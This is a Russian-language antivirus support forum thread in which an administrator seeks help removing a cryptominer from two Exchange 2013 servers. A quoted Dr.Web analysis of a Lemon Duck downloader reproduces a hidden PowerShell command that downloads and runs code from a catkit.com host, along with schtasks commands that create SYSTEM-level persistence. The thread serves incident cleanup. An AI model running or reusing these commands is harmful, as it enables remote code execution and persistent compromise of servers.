запуск майнера на серверах с MS Exchange 2013 - Форум технической поддержки ESET NOD32

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 26.07.2021 09:55:41

Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.

Прикрепленные файлы

2021-07-26_09-29-04.png (82.73 КБ)

IZTVMAIL01_2021-07-26_09-39-43_v4.11.6.7z (738.73 КБ)

Сообщений: 17910

Баллов: 28655

Регистрация: 16.03.2010

Размещено 26.07.2021 16:04:50

процесс rundll32.exe (с внедренным майнером) закрыли перед созданием образа автозапуска?
может переделаете образ автозапуска с активным процессом, чтобы можно было увидеть какой процесс ему внедряет майнера?

пока что видно несколько заданий, запускаемых из WMI:
WMI:\\.\ROOT\SUBSCRIPTION\.[F5BR1LMHB]
WMI:\\.\ROOT\SUBSCRIPTION\.[FKB6RDNGR]
WMI:\\.\ROOT\SUBSCRIPTION\.[FOQ6EDPWMK]
WMI:\\.\ROOT\SUBSCRIPTION\.[FUTWMFBRLE4]

+
по второму серверу сделайте образ автозапуска, чтобы было с чем сравнить

[ Как создать образ автозапуска? ]

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 27.07.2021 09:25:49

Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.

Сообщений: 6220

Баллов: 4976

Регистрация: 25.05.2010

Размещено 27.07.2021 15:16:49

Цитата
Владимир Шариков написал: Запускается в 2:30 каждый день

В Задачах:

Полное имя T.NETCATKIT.COM
Имя файла T.NETCATKIT.COM
Тек. статус в автозапуске

Сохраненная информация на момент создания образа
Статус в автозапуске

Ссылки на объект
Ссылка C:\WINDOWS\SYSTEM32\TASKS\T.NETCATKIT.COM

https://www.virustotal.com/gui/url/1d48c0de95f50662b0a356670209877bf3938263f892148458963b4f09b82ad2/detection

Сообщений: 17910

Баллов: 28655

Регистрация: 16.03.2010

Размещено 27.07.2021 16:48:33

да, T.NETCATKIT.COM тоже может быть частью заданий злоумышленников

[ Как создать образ автозапуска? ]

Сообщений: 17910

Баллов: 28655

Регистрация: 16.03.2010

Размещено 27.07.2021 16:52:29

Цитата
Владимир Шариков написал: Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.

не нужно,
как процесс запустится, сделайте образы автозапуска, потом процессы можно закрыть, вечером посмотрим образы, и напишем скрипты очистки

[ Как создать образ автозапуска? ]

Сообщений: 6220

Баллов: 4976

Регистрация: 25.05.2010

Размещено 27.07.2021 17:34:34

drweb.ru

Цитата
Trojan.DownLoader38.26327 Добавлен в вирусную базу Dr.Web: 2021-04-08 Техническая информация Для обеспечения автозапуска и распространения Создает или изменяет следующие файлы <SYSTEM32>\tasks\t.netcatkit.com <SYSTEM32>\tasks\xr6ziynzn Вредоносные функции Загружает http://+t.###+catkit.com/a.jsp?re################################ as %username% Сетевая активность UDP DNS ASK t.###catkit.com Другое Создает и запускает на исполнение '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном) Запускает на исполнение '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD" '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN

Цитата

Trojan.DownLoader38.26327

Добавлен в вирусную базу Dr.Web: 2021-04-08

Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы

<SYSTEM32>\tasks\t.netcatkit.com
<SYSTEM32>\tasks\xr6ziynzn

Вредоносные функции
Загружает

http://+t.###+catkit.com/a.jsp?re################################ as %username%

Сетевая активность
UDP

DNS ASK t.###catkit.com

Другое
Создает и запускает на исполнение

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN

Сообщений: 6220

Баллов: 4976

Регистрация: 25.05.2010

Размещено 27.07.2021 17:39:13

+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

Сообщений: 17910

Баллов: 28655

Регистрация: 16.03.2010

Размещено 27.07.2021 17:43:53

да, это было в предыдущей атаке Proxylogon на эти же сервера,
но здесь еще есть новые задания WMI, потому лучше полный образ получить с нагруженным процессом rundll32.exe
и второй образ проверить, что в нем есть

[ Как создать образ автозапуска? ]

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 28.07.2021 09:56:47

В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?

Прикрепленные файлы

SPHVMAIL01.zip (12.34 КБ)
IZTVMAIL01.txt (3.31 КБ)

[ Закрыто ] запуск майнера на серверах с MS Exchange 2013